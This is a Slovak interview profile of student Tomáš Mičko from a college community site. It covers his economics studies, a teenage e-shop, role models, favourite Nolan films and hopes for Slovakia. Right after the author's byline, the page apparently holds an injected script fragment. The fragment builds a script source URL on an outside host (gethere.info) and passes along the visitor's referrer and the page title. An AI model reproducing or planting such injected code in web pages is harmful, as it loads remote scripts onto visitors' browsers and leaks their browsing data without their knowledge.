&8 Tomáš Mičko

Rodený Popradčan má rád filmy Christophera Nolana a skôr, než mal v ruke občiansky preukaz, založil si s kamarátom e-shop. Aj to je pravdepodobne dôvodom, prečo študuje odbor financie, bankovníctvo a investovanie na Ekonomickej univerzite v Bratislave.

Čo študuješ?

Na Ekonomickej univerzite v Bratislave, odbor Financie, bankovníctvo a investovanie

Prečo si v Kolégiu?

Potom, ako som si vyskúšal podnikanie, študentský život a aj život v korporácii, som zistil, že k šťastiu mi predsa len ešte niečo chýba. Že tento statický pozemský svet tu bude o rok, o päť, o desať a svoju pozíciu na trhu môžem v týchto intervaloch zmeniť. Čo mi ale chýbalo, bolo poznanie, ako to všetko docieliť s dobrými prostriedkami – tak aby bola aj duša naplnená.

V čom Ťa Kolégium zatiaľ najviac zmenilo? 

Asi v tom, že činnosti a rozhodnutia, v ktorých sa dennodenne nachádzam, začínam vyhodnocovať a prehodnocovať v pravde. Nevyberám si už vždy tú najľahšiu cestičku.

Aký je Tvoj doterajší najväčší zážitok z Kolégia? 

Nedá sa povedať ani, že by bol jeden, ani že by bol najväčší. Zatiaľ je to skôr súbor viacerých malých, ale silných zážitkov, ktorých gro tvoria ľudia a najmä Pán.

Čím tráviš voľný čas? 

Taký čas som v Kolégiu ešte nezažil. No predtým to boli lyže.

Na čo si vo svojom živote zatiaľ najviac pyšný? 

V 14- tich rokoch som s kamarátom založil e-shop, ktorému sa pomerne dlho darilo.

Kto je Tvojím vzorom? Prečo? 

Ak berieme len svetský život, tak nemám jedného konkrétneho človeka, ale viacerých. V podstate mám vzory na dennej báze. Vôbec to nemusí byť niekto inšpiratívny, úspešný či vzdelaný. Stačí, že slúži ľuďom okolo ako bod oporný. Má čistú myseľ aj srdce a pred sebou cieľ. Takýto človek má častokrát zvládnutý vysoký level líderstva, ktorým sa ale neprezentuje úmyselne.

Čo by si chcel robiť v budúcnosti? 

Starať sa o veľkú rodinu a popritom sa venovať behaviorálnej ekonómii. To by bola idylka.

Keby si mohol zmeniť na Slovensku aspoň jednu vec, čo by to bolo? 

Mentálne nastavenie ľudí. Školstvo. Spoplatnenie a zrýchlenie vlakov. Myslím si tiež , že by si aj mládež v Košiciach zaslúžila Kolégium.

Ktorý film Ťa zatiaľ najviac zasiahol?

Inception, The Prestige… štatisticky každý druhý film od Christophera Nolana je pecka.

Aké hudobné dielo Ťa najviac zasiahlo?

Nový Človek od Majka Spirita.

Spracoval Matúš Ďuraňas.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *